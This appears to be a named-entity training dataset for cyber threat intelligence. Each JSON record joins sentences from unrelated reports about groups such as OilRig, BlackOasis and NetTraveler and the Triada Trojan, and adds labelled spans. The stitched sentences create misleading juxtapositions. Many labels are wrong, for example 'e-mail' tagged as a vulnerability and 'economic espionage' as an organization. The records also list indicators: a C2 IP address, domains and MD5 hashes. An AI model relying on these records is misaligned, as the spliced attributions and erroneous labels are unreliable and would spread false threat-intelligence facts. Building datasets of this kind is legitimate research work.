{"text": "It is interesting that the attackers used Java Base64 library developed by Sauron Software . LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) . NEODYMIUM used a backdoor detected by Windows Defender as Wingbird , whose characteristics closely match FinFisher , a government-grade commercial surveillance package .", "spans": [{"start": 75, "end": 90, "label": "Organization"}, {"start": 141, "end": 171, "label": "Vulnerability"}, {"start": 174, "end": 188, "label": "Vulnerability"}, {"start": 193, "end": 202, "label": "Organization"}, {"start": 231, "end": 238, "label": "System"}, {"start": 251, "end": 259, "label": "Malware"}, {"start": 298, "end": 307, "label": "Organization"}]}
{"text": "This software is free and distributed under LGPL license . No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" \u2014 a near-year-old Java security hole \u2014 \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported . In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown .", "spans": [{"start": 62, "end": 86, "label": "Vulnerability"}, {"start": 183, "end": 196, "label": "Vulnerability"}, {"start": 244, "end": 257, "label": "Vulnerability"}, {"start": 290, "end": 307, "label": "Organization"}, {"start": 370, "end": 385, "label": "Organization"}, {"start": 388, "end": 398, "label": "Organization"}, {"start": 403, "end": 412, "label": "Organization"}, {"start": 471, "end": 478, "label": "Vulnerability"}, {"start": 479, "end": 486, "label": "Vulnerability"}]}
{"text": "Also , command communications with the malware are parsed with a function named \u201c chuli ( ) \u201d prior to POSTing stolen data to the command-and-control server . Execute a command through exploits for CVE-2017-11882 . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": [{"start": 198, "end": 212, "label": "Vulnerability"}, {"start": 275, "end": 285, "label": "Organization"}, {"start": 288, "end": 297, "label": "Organization"}, {"start": 331, "end": 349, "label": "System"}, {"start": 350, "end": 358, "label": "Vulnerability"}, {"start": 375, "end": 388, "label": "Vulnerability"}, {"start": 435, "end": 441, "label": "Malware"}]}
{"text": "It appears that the attackers are somewhat familiar with the language and mountain-trekking culture of the targets \u2013 the meaning of \u201c chuli \u201d is \u201c summit \u201d : The command-and-control server and parameters can be easily seen in the decompiled source code : Command and control server interaction code Throughout the code , the attackers log all important actions , which include various messages in Chinese . Execute a command through exploits for CVE-2018-0802 . FinSpy , a final-stage payload that allows for an attacker to covertly learn what a target is talking about and who they are communicating with , is associated with Gamma Group \u2014 which goes by other names , including FinFisher and Lench IT Solutions .", "spans": [{"start": 446, "end": 459, "label": "Vulnerability"}, {"start": 462, "end": 468, "label": "Malware"}, {"start": 512, "end": 520, "label": "Organization"}, {"start": 627, "end": 638, "label": "Organization"}, {"start": 679, "end": 688, "label": "Organization"}]}
{"text": "This was probably done for debugging purposes , indicating the malware may be an early prototype version . The document attached to this e-mail exploits CVE-2012-0158 . In the past , BlackOasis messages were designed to appear like news articles from 2016 about political relations between Angola and China .", "spans": [{"start": 137, "end": 152, "label": "Vulnerability"}, {"start": 153, "end": 166, "label": "Vulnerability"}, {"start": 183, "end": 193, "label": "Organization"}, {"start": 262, "end": 271, "label": "Organization"}]}
{"text": "Some actions include ( with rough translations ) : The command-and-control server The command-and-control server is located at IP 64.78.161.133 . Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors . BlackOasis in recent months sent a wave of phishing emails .", "spans": [{"start": 130, "end": 143, "label": "Indicator"}, {"start": 146, "end": 160, "label": "Organization"}, {"start": 186, "end": 199, "label": "Vulnerability"}, {"start": 230, "end": 240, "label": "Organization"}, {"start": 282, "end": 288, "label": "System"}]}
{"text": "This IP is located in Los Angeles , U.S.A. , at a hosting company named \u201c Emagine Concept Inc \u201d . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . PROMETHIUM uses a unique set of tools and methods to perform actions like lateral movement and data Exfiltration .", "spans": [{"start": 74, "end": 93, "label": "Organization"}, {"start": 102, "end": 111, "label": "Malware"}, {"start": 195, "end": 208, "label": "Vulnerability"}, {"start": 264, "end": 294, "label": "Vulnerability"}, {"start": 339, "end": 349, "label": "Organization"}]}
{"text": "Interestingly , there is a domain which used to point there , \u201c DlmDocumentsExchange.com \u201d . the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated . Last year , Microsoft researchers described Neodymium 's behavior as unusual : \" unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals .", "spans": [{"start": 64, "end": 88, "label": "Indicator"}, {"start": 136, "end": 149, "label": "Vulnerability"}, {"start": 150, "end": 161, "label": "Vulnerability"}, {"start": 199, "end": 208, "label": "Organization"}, {"start": 231, "end": 240, "label": "Organization"}, {"start": 280, "end": 295, "label": "Organization"}, {"start": 354, "end": 362, "label": "Organization"}, {"start": 375, "end": 385, "label": "Organization"}, {"start": 390, "end": 399, "label": "Organization"}]}
{"text": "The domain was registered on March 8th , 2013 : Registration Service Provided By : SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO. , LTD. Domain Name : DLMDOCUMENTSEXCHANGE.COM Registration Date : 08-Mar-2013 Expiration Date : 08-Mar-2014 Status : LOCKED The domain registration data indicates the following owner : Registrant Contact Details : peng jia peng jia ( bdoufwke123010 @ gmail.com ) beijingshiahiidienquc.d beijingshi beijing,100000 While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 .", "spans": [{"start": 83, "end": 146, "label": "Organization"}, {"start": 161, "end": 185, "label": "Indicator"}, {"start": 374, "end": 400, "label": "Indicator"}, {"start": 403, "end": 426, "label": "Indicator"}, {"start": 542, "end": 555, "label": "Vulnerability"}, {"start": 556, "end": 575, "label": "Vulnerability"}, {"start": 594, "end": 604, "label": "Organization"}, {"start": 637, "end": 646, "label": "Organization"}, {"start": 672, "end": 680, "label": "Vulnerability"}, {"start": 681, "end": 688, "label": "Vulnerability"}, {"start": 697, "end": 707, "label": "Organization"}]}
{"text": "CN Tel . However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised . Victims of BlackOasis have been observed in the following countries : Russia , Iraq , Afghanistan , Nigeria , Libya , Jordan , Tunisia , Saudi Arabia , Iran , Netherlands , Bahrain , United Kingdom and Angola .", "spans": [{"start": 45, "end": 50, "label": "Organization"}, {"start": 59, "end": 76, "label": "Vulnerability"}, {"start": 147, "end": 157, "label": "Organization"}]}
{"text": "+86.01078456689 Fax . PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach . Unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals .", "spans": [{"start": 130, "end": 149, "label": "Vulnerability"}, {"start": 152, "end": 165, "label": "Vulnerability"}, {"start": 229, "end": 244, "label": "Organization"}, {"start": 303, "end": 311, "label": "Organization"}, {"start": 324, "end": 334, "label": "Organization"}, {"start": 339, "end": 348, "label": "Organization"}]}
{"text": "+86.01078456689 The command-and-control server is hosting an index page which also serves an APK file : The referenced \u201c Document.apk \u201d is 333583 bytes in size , MD5 : c4c4077e9449147d754afd972e247efc . PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server . A cursory review of BlackOasis ' espionage campaign suggests there is some overlap between the group 's actions and Saudi Arabia 's geopolitical interests .", "spans": [{"start": 121, "end": 133, "label": "Indicator"}, {"start": 168, "end": 200, "label": "Indicator"}, {"start": 219, "end": 232, "label": "Vulnerability"}, {"start": 376, "end": 386, "label": "Organization"}, {"start": 488, "end": 500, "label": "Organization"}]}
{"text": "It has the same functionality as the one described above but contains different text . Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) . Kaspersky 's research notes that BlackOasis hacked into computers based in Saudi Arabia .", "spans": [{"start": 87, "end": 100, "label": "Organization"}, {"start": 183, "end": 196, "label": "Vulnerability"}, {"start": 199, "end": 212, "label": "Vulnerability"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 298, "end": 308, "label": "Organization"}]}
{"text": "The new text ( in Chinese , about relations between China , Japan and the disputed \u201c Senkaku Islands / Diaoyudao Islands / Diaoyutai Islands \u201d ) is shown to the victims and reads as following : When opened in a browser , this is what the command-and-control index page looks like : The text on the top means \u201c Title Title Title \u201d in Chinese , while the other strings appear to be random characters typed from the keyboard . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . All 13 countries where Kaspersky reportedly observed BlackOasis activity are connected to Saudi Arabia in one of three ACTs : economically ; from a national security perspective ; or due to established policy agreements .", "spans": [{"start": 431, "end": 439, "label": "Malware"}, {"start": 488, "end": 501, "label": "Vulnerability"}, {"start": 504, "end": 517, "label": "Vulnerability"}, {"start": 521, "end": 534, "label": "Vulnerability"}, {"start": 625, "end": 634, "label": "Organization"}]}
{"text": "Interestingly , the command and control server includes a publicly accessible interface to work with the victims : Some of the commands with rough translations : The command-and-control server is running Windows Server 2003 and has been configured for Chinese language : This , together with the logs , is a strong indicator that the attackers are Chinese-speaking . Moreover , they used the same exploit kit Niteris as that in the Corkow case . The Operation Aurora , named by McAfee and announced in January 2010 , and the WikiLeaks document disclosures of 2010 have highlighted the fact that external and internal threats are nearly impossible to prevent .", "spans": [{"start": 204, "end": 218, "label": "System"}, {"start": 405, "end": 416, "label": "Vulnerability"}, {"start": 432, "end": 438, "label": "System"}, {"start": 478, "end": 484, "label": "Organization"}, {"start": 525, "end": 534, "label": "Organization"}]}
{"text": "Conclusions Every day , there are hundreds if not thousands of targeted attacks against Tibetan and Uyghur supporters . The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story . These attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations .", "spans": [{"start": 124, "end": 137, "label": "Vulnerability"}, {"start": 232, "end": 250, "label": "Organization"}, {"start": 293, "end": 302, "label": "Organization"}, {"start": 303, "end": 310, "label": "System"}, {"start": 347, "end": 356, "label": "Organization"}, {"start": 403, "end": 430, "label": "Malware"}, {"start": 433, "end": 437, "label": "Malware"}, {"start": 562, "end": 573, "label": "Organization"}]}
{"text": "The vast majority of these target Windows machines through Word documents exploiting known vulnerabilities such as CVE-2012-0158 , CVE-2010-3333 and CVE-2009-3129 . The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated . Night Dragon 's attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations .", "spans": [{"start": 34, "end": 41, "label": "System"}, {"start": 59, "end": 63, "label": "System"}, {"start": 115, "end": 128, "label": "Vulnerability"}, {"start": 131, "end": 144, "label": "Vulnerability"}, {"start": 149, "end": 162, "label": "Vulnerability"}, {"start": 169, "end": 184, "label": "System"}, {"start": 197, "end": 212, "label": "Vulnerability"}, {"start": 255, "end": 266, "label": "Organization"}, {"start": 270, "end": 280, "label": "Organization"}, {"start": 293, "end": 305, "label": "Organization"}, {"start": 331, "end": 349, "label": "Organization"}, {"start": 392, "end": 401, "label": "Organization"}, {"start": 402, "end": 409, "label": "System"}, {"start": 446, "end": 455, "label": "Organization"}, {"start": 502, "end": 529, "label": "Malware"}, {"start": 532, "end": 536, "label": "Malware"}, {"start": 661, "end": 672, "label": "Organization"}]}
{"text": "In this case , the attackers hacked a Tibetan activist \u2019 s account and used it to attack Uyghur activists . While documents designed to exploit the InPage software are rare , they are not new \u2013 however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky . We have identified the tools , techniques , and network activities used in these continuing attacks\u2014which we have dubbed Night Dragon\u2014as originating primarily in China .", "spans": [{"start": 148, "end": 163, "label": "System"}, {"start": 218, "end": 224, "label": "Organization"}, {"start": 247, "end": 262, "label": "Vulnerability"}, {"start": 358, "end": 367, "label": "Organization"}, {"start": 491, "end": 506, "label": "Organization"}]}
{"text": "It indicates perhaps an interesting trend which is exploiting the trust relationships between the two communities . Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": [{"start": 128, "end": 137, "label": "Organization"}, {"start": 307, "end": 320, "label": "Vulnerability"}, {"start": 325, "end": 339, "label": "Vulnerability"}, {"start": 342, "end": 351, "label": "Organization"}, {"start": 400, "end": 403, "label": "System"}, {"start": 536, "end": 539, "label": "Organization"}, {"start": 542, "end": 545, "label": "Organization"}, {"start": 552, "end": 575, "label": "Organization"}, {"start": 605, "end": 615, "label": "Organization"}]}
{"text": "This technique reminds us of a combination between ages old war strategies \u201c Divide et impera \u201d and \u201c By way of deception \u201d . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": [{"start": 135, "end": 144, "label": "Organization"}, {"start": 171, "end": 180, "label": "Malware"}, {"start": 192, "end": 205, "label": "Vulnerability"}, {"start": 208, "end": 217, "label": "Organization"}, {"start": 266, "end": 269, "label": "System"}, {"start": 402, "end": 405, "label": "Organization"}, {"start": 408, "end": 411, "label": "Organization"}, {"start": 418, "end": 441, "label": "Organization"}, {"start": 471, "end": 481, "label": "Organization"}]}
{"text": "Until now , we haven \u2019 t seen targeted attacks against mobile phones , although we \u2019 ve seen indications that these were in development . Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . The primary operational technique used by Night Dragon comprised a variety of hacker tools , including privately developed and customized RAT tools that provided complete remote administration capabilities to the attacker .", "spans": [{"start": 138, "end": 148, "label": "System"}, {"start": 243, "end": 256, "label": "Vulnerability"}, {"start": 261, "end": 275, "label": "Vulnerability"}, {"start": 320, "end": 332, "label": "Organization"}, {"start": 416, "end": 425, "label": "Malware"}, {"start": 491, "end": 499, "label": "Organization"}]}
{"text": "The current attack took advantage of the compromise of a high-profile Tibetan activist . The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 . While Night Dragon attacks focused specifically on the energy sector , the tools and techniques of this kind can be highly successful when targeting any industry .", "spans": [{"start": 93, "end": 108, "label": "System"}, {"start": 162, "end": 175, "label": "Vulnerability"}, {"start": 233, "end": 246, "label": "Organization"}]}
{"text": "It is perhaps the first in a new wave of targeted attacks aimed at Android users . The documents that exploit CVE2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe . In addition , the attackers employed hacking tools of Chinese origin and that are prevalent on Chinese underground hacking forums .", "spans": [{"start": 67, "end": 74, "label": "System"}, {"start": 110, "end": 123, "label": "Vulnerability"}, {"start": 154, "end": 170, "label": "System"}, {"start": 173, "end": 176, "label": "Malware"}, {"start": 306, "end": 315, "label": "Malware"}, {"start": 336, "end": 345, "label": "Organization"}]}
{"text": "So far , the attackers relied entirely on social engineering to infect the targets . Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users . We have been presented with a rare opportunity to see some development activities from the actors associated with the OilRig attack campaign , a campaign Unit 42 has been following since May 2016 .", "spans": [{"start": 112, "end": 130, "label": "Vulnerability"}, {"start": 152, "end": 164, "label": "Vulnerability"}, {"start": 332, "end": 338, "label": "Organization"}, {"start": 395, "end": 402, "label": "Organization"}]}
{"text": "History has shown us that , in time , these attacks will use zero-day vulnerabilities , exploits or a combination of techniques . Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance . Recently we were able to observe these actors making modifications to their Clayslide delivery documents in an attempt to evade antivirus detection .", "spans": [{"start": 61, "end": 85, "label": "Vulnerability"}, {"start": 175, "end": 190, "label": "Vulnerability"}, {"start": 233, "end": 238, "label": "Organization"}, {"start": 384, "end": 390, "label": "Organization"}, {"start": 421, "end": 449, "label": "Malware"}]}
{"text": "For now , the best protection is to avoid any APK attachments that arrive on mobile phones via e-mail . In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware . We collected two sets of Clayslide samples that appear to be created during the OilRig actor 's development phase of their attack lifecycle .", "spans": [{"start": 185, "end": 198, "label": "Vulnerability"}, {"start": 256, "end": 273, "label": "Malware"}, {"start": 311, "end": 323, "label": "Organization"}]}
{"text": "We detect the malware used in this attack as \u201c Backdoor.AndroidOS.Chuli.a \u201d . Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) . On November 15 , 2016 , an actor related to the OilRig campaign began testing the Clayslide delivery documents .", "spans": [{"start": 47, "end": 73, "label": "Malware"}, {"start": 123, "end": 135, "label": "Organization"}, {"start": 175, "end": 190, "label": "Organization"}, {"start": 226, "end": 233, "label": "Organization"}, {"start": 263, "end": 285, "label": "Vulnerability"}, {"start": 288, "end": 301, "label": "Vulnerability"}, {"start": 333, "end": 338, "label": "Organization"}, {"start": 388, "end": 416, "label": "Malware"}]}
{"text": "MD5s : c4c4077e9449147d754afd972e247efc Document.apk 0b8806b38b52bebfe39ff585639e2ea2 WUC \u2019 s Conference.apk Triada : organized crime on Android Triada is a modular mobile Trojan that actively uses root privileges to substitute system files and uses several clever methods to become almost invisible March 3 , 2016 You know how armies typically move : first come the scouts to make sure everything is ok. Then the heavy troops The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild . The actor then made subtle modifications to the file and uploaded the newly created file to the same popular antivirus testing website in order to determine how to evade detection .", "spans": [{"start": 7, "end": 39, "label": "Indicator"}, {"start": 40, "end": 52, "label": "Indicator"}, {"start": 53, "end": 85, "label": "Indicator"}, {"start": 94, "end": 108, "label": "Indicator"}, {"start": 109, "end": 115, "label": "Malware"}, {"start": 137, "end": 144, "label": "System"}, {"start": 145, "end": 151, "label": "Malware"}, {"start": 446, "end": 468, "label": "System"}, {"start": 519, "end": 526, "label": "Organization"}, {"start": 549, "end": 565, "label": "Vulnerability"}, {"start": 568, "end": 581, "label": "Vulnerability"}, {"start": 607, "end": 612, "label": "Organization"}]}
{"text": "arrive ; at least that was how it used to be before the age of cyber wars . While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) . In addition to making changes to the Excel worksheets that contain the decoy content , the actor also made changes to the worksheet that is initially displayed to the user .", "spans": [{"start": 201, "end": 217, "label": "Vulnerability"}, {"start": 220, "end": 233, "label": "Vulnerability"}, {"start": 329, "end": 334, "label": "Organization"}]}
{"text": "It turns out , that Trojans behave quite the same way . To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 . Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system .", "spans": [{"start": 125, "end": 141, "label": "System"}, {"start": 158, "end": 171, "label": "System"}, {"start": 208, "end": 224, "label": "Vulnerability"}, {"start": 227, "end": 240, "label": "Vulnerability"}, {"start": 308, "end": 314, "label": "Organization"}, {"start": 322, "end": 350, "label": "Indicator"}]}
{"text": "There are a lot of small Trojans for Android capable of leveraging access privileges , in other words \u2014 gaining root access . This sample was also found to be deployed using the CVE-2012-0158 vulnerability . This realization suggests that the OilRig threat group will continue to use their delivery documents for extended periods with subtle modifications to remain effective .", "spans": [{"start": 37, "end": 44, "label": "System"}, {"start": 178, "end": 191, "label": "Vulnerability"}, {"start": 243, "end": 249, "label": "Organization"}, {"start": 290, "end": 308, "label": "Malware"}]}
{"text": "Our malware analysts Nikita Buchka and Mikhail Kuzin can easily name 11 families of such Trojans . Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . Iranian threat agent OilRig has been targeting multiple organisations in Israel and other countries in the Middle East since the end of 2015 .", "spans": [{"start": 151, "end": 164, "label": "Vulnerability"}, {"start": 176, "end": 194, "label": "System"}, {"start": 218, "end": 224, "label": "Organization"}]}
{"text": "Most of them are almost harmless \u2014 all they did until recently was injecting tons of ads and downloading others of their kind . Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . In recent attacks they set up a fake VPN Web Portal and targeted at least five Israeli IT vendors , several financial institutes , and the Israeli Post Office .", "spans": [{"start": 128, "end": 135, "label": "Organization"}, {"start": 159, "end": 170, "label": "System"}, {"start": 192, "end": 205, "label": "Vulnerability"}, {"start": 217, "end": 235, "label": "System"}, {"start": 275, "end": 289, "label": "Malware"}, {"start": 325, "end": 335, "label": "Organization"}, {"start": 346, "end": 366, "label": "Organization"}, {"start": 377, "end": 396, "label": "Organization"}]}
{"text": "If you want to know more about them \u2014 our researchers have an article about them on Securelist . Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . In these websites they hosted malware that was digitally signed with a valid , likely stolen code signing certificate .", "spans": [{"start": 84, "end": 94, "label": "Organization"}, {"start": 121, "end": 132, "label": "System"}, {"start": 154, "end": 167, "label": "Vulnerability"}, {"start": 179, "end": 197, "label": "System"}, {"start": 286, "end": 317, "label": "Malware"}]}
{"text": "If you follow the military analogy \u2014 those are the scouts . In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . In December 2015 , Symantec published a post about \" two Iran-based attack groups that appear to be connected , Cadelle and Chafer \" that \" have been using Backdoor.Cadelspy and Backdoor.Remexi to spy on Iranian individuals and Middle Eastern organizations \" .", "spans": [{"start": 126, "end": 139, "label": "Vulnerability"}, {"start": 155, "end": 173, "label": "System"}, {"start": 195, "end": 203, "label": "Organization"}, {"start": 244, "end": 257, "label": "Organization"}, {"start": 288, "end": 295, "label": "Organization"}, {"start": 300, "end": 306, "label": "Organization"}, {"start": 332, "end": 349, "label": "Malware"}, {"start": 354, "end": 369, "label": "Malware"}]}
{"text": "As you probably have noticed , gaining root access gives them the capability to download and install applications \u2014 that \u2019 s the reason why once one of them get into the system , in a few minutes there are all the others . In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . In May 2016 , Unit 42 observed attacks of OilRig primarily focused on financial institutions and technology organizations within Saudi Arabia .", "spans": [{"start": 257, "end": 268, "label": "System"}, {"start": 290, "end": 303, "label": "Vulnerability"}, {"start": 319, "end": 337, "label": "System"}, {"start": 354, "end": 361, "label": "Organization"}, {"start": 382, "end": 388, "label": "Organization"}, {"start": 410, "end": 432, "label": "Organization"}, {"start": 437, "end": 461, "label": "Organization"}]}
{"text": "But our researchers have predicted that these small Trojans would certainly be used to download some really bad malware that can actually harm the owners of the infected devices . In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . In recent OilRig attacks , the threat actors purport to be legitimate service providers offering service and technical troubleshooting as a social engineering theme in their spear-phishing attacks .", "spans": [{"start": 218, "end": 229, "label": "System"}, {"start": 251, "end": 264, "label": "Vulnerability"}, {"start": 280, "end": 298, "label": "System"}, {"start": 339, "end": 345, "label": "Organization"}, {"start": 360, "end": 388, "label": "Organization"}, {"start": 441, "end": 459, "label": "Organization"}]}
{"text": "And that \u2019 s exactly what has happened recently . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . The campaign appears highly targeted and delivers a backdoor we have called ' Helminth ' .", "spans": [{"start": 50, "end": 63, "label": "Organization"}, {"start": 87, "end": 112, "label": "Vulnerability"}, {"start": 160, "end": 187, "label": "Malware"}, {"start": 190, "end": 217, "label": "Malware"}, {"start": 298, "end": 306, "label": "Malware"}]}
{"text": "Small Trojans like Leech , Ztorg and Gopro now download one of the most advanced mobile Trojans our malware analysts have ever encountered \u2014 we call it Triada . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . Artifacts identified within the malware samples related to these attacks also suggest the targeting of the defense industry in Saudi Arabia , which appears to be related to an earlier wave of attacks carried out in the fall of 2015 .", "spans": [{"start": 19, "end": 24, "label": "Malware"}, {"start": 27, "end": 32, "label": "Malware"}, {"start": 37, "end": 42, "label": "Malware"}, {"start": 152, "end": 158, "label": "Malware"}, {"start": 165, "end": 170, "label": "Malware"}, {"start": 194, "end": 224, "label": "Vulnerability"}, {"start": 227, "end": 240, "label": "Vulnerability"}, {"start": 281, "end": 293, "label": "Malware"}, {"start": 427, "end": 443, "label": "Organization"}]}
{"text": "Triada is a modular mobile Trojan that actively uses root privileges to substitute system files and exists mostly in the device \u2019 s RAM , which makes it extremely hard to detect . Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . In May 2016 , Unit 42 began researching attacks that used spear-phishing emails with attachments , specifically malicious Excel spreadsheets sent to financial organizations within Saudi Arabia .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 201, "end": 211, "label": "Organization"}, {"start": 241, "end": 276, "label": "Vulnerability"}, {"start": 322, "end": 329, "label": "Organization"}, {"start": 457, "end": 480, "label": "Organization"}]}
{"text": "The dark ways of the Triada Once downloaded and installed , the Triada Trojan first tries to collect some information about the system \u2014 like the device model , the OS version , the amount of the SD card space , the list of the installed applications and other things . Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit . Over the course of the attack campaign , we have observed two different variations of the Helminth backdoor , one written in VBScript and PowerShell that was delivered via a macro within Excel spreadsheets and the other a standalone Windows executable .", "spans": [{"start": 21, "end": 27, "label": "Malware"}, {"start": 64, "end": 70, "label": "Malware"}, {"start": 381, "end": 386, "label": "Vulnerability"}, {"start": 389, "end": 415, "label": "Vulnerability"}, {"start": 508, "end": 525, "label": "Malware"}, {"start": 556, "end": 566, "label": "System"}]}
{"text": "Then it sends all that information to the Command & Control server . Adobe Flash Player exploit . FireEye also reported on these attacks in a May 22 blog post .", "spans": [{"start": 69, "end": 95, "label": "Vulnerability"}, {"start": 98, "end": 105, "label": "Organization"}]}
{"text": "We have detected a total of 17 C & C servers on 4 different domains , which probably means the bad guys are quite familiar with what redundancy is . It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April . The executable variant of Helminth is installed with a dropper Trojan that we are tracking as the HerHer Trojan .", "spans": [{"start": 174, "end": 183, "label": "Organization"}, {"start": 201, "end": 217, "label": "Vulnerability"}, {"start": 220, "end": 233, "label": "Vulnerability"}, {"start": 291, "end": 299, "label": "Malware"}, {"start": 320, "end": 334, "label": "Malware"}, {"start": 363, "end": 376, "label": "Malware"}]}
{"text": "The C & C server then responds with a configuration file , containing the personal identification number for the device and some settings \u2014 the time interval between contacting the server , the list of modules to be installed and so on . Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . The Helminth executable variant is very similar in functionality to its script-based counterpart , as it also communicates with its C2 server using both HTTP and DNS queries .", "spans": [{"start": 273, "end": 293, "label": "Vulnerability"}, {"start": 296, "end": 309, "label": "Vulnerability"}, {"start": 359, "end": 367, "label": "Malware"}, {"start": 487, "end": 489, "label": "System"}, {"start": 508, "end": 512, "label": "Malware"}, {"start": 517, "end": 520, "label": "Malware"}]}
{"text": "After the modules are installed they are deployed to the short term memory and deleted from the device storage , which makes the Trojan a lot harder to catch . ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . Helminth executable samples send artifacts within network beacons to its C2 server that the Trojan refers to as a ' Group ' and ' Name ' .", "spans": [{"start": 160, "end": 169, "label": "Organization"}, {"start": 208, "end": 228, "label": "Vulnerability"}, {"start": 231, "end": 244, "label": "Vulnerability"}, {"start": 290, "end": 298, "label": "Malware"}, {"start": 363, "end": 365, "label": "System"}, {"start": 382, "end": 388, "label": "Malware"}]}
{"text": "There are two more reasons why Triada is so hard to detect and why it had impressed our researchers so much . Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets . It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries .", "spans": [{"start": 31, "end": 37, "label": "Malware"}, {"start": 159, "end": 168, "label": "Organization"}, {"start": 202, "end": 219, "label": "Vulnerability"}, {"start": 418, "end": 436, "label": "Organization"}, {"start": 441, "end": 459, "label": "Organization"}]}
